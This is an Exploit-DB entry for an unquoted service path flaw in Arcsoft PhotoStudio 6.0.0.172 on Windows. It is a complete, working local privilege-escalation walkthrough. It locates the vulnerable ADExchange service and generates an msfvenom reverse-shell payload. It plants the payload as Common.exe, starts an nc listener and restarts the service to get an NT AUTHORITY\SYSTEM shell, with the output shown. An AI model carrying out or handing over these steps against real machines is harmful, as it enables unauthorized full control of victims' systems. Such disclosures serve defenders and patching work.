Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path

EDB-ID:

51393

CVE:

N/A


Author:

msd0pe

Type:

local


Platform:

Windows

Date:

2023-04-25


##########################################################################
#                                                                        #
#  Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path  #
#  Date: 2023/04/22                                                      #
#  Exploit Author: msd0pe                                                #
#  Vendor Homepage: https://www.arcsoft.com/                             #
#  My Github: https://github.com/msd0pe-1                                #
#                                                                        #
##########################################################################

Arcsoft PhotoStudio:
Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

    ArcSoft Exchange Service   ADExchange   C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe   Auto

[2] Get informations about the service:
    > sc qc "ADExchange"

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: ADExchange
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : ArcSoft Exchange Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe

[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
    > put Commom.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 .
    drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 ..
    drw-rw-rw-          0  Sun Apr 23 03:55:37 2023 ArcSoft
    drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 Common Files
    -rw-rw-rw-       7168  Sun Apr 23 04:10:25 2023 Common.exe
    -rw-rw-rw-        174  Sun Jul 24 08:12:38 2022 desktop.ini
    drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 InstallShield Installation Information
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Internet Explorer
    drw-rw-rw-          0  Sun Jul 24 07:27:06 2022 Microsoft
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Microsoft.NET
    drw-rw-rw-          0  Sat Apr 22 05:48:20 2023 Windows Defender
    drw-rw-rw-          0  Sat Apr 22 05:46:44 2023 Windows Mail
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Media Player
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows NT
    drw-rw-rw-          0  Fri Oct 28 05:25:41 2022 Windows Photo Viewer
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Portable Devices
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Sidebar
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 WindowsPowerShell

[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop "ADExchange"
    > sc start "ADExchange"

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system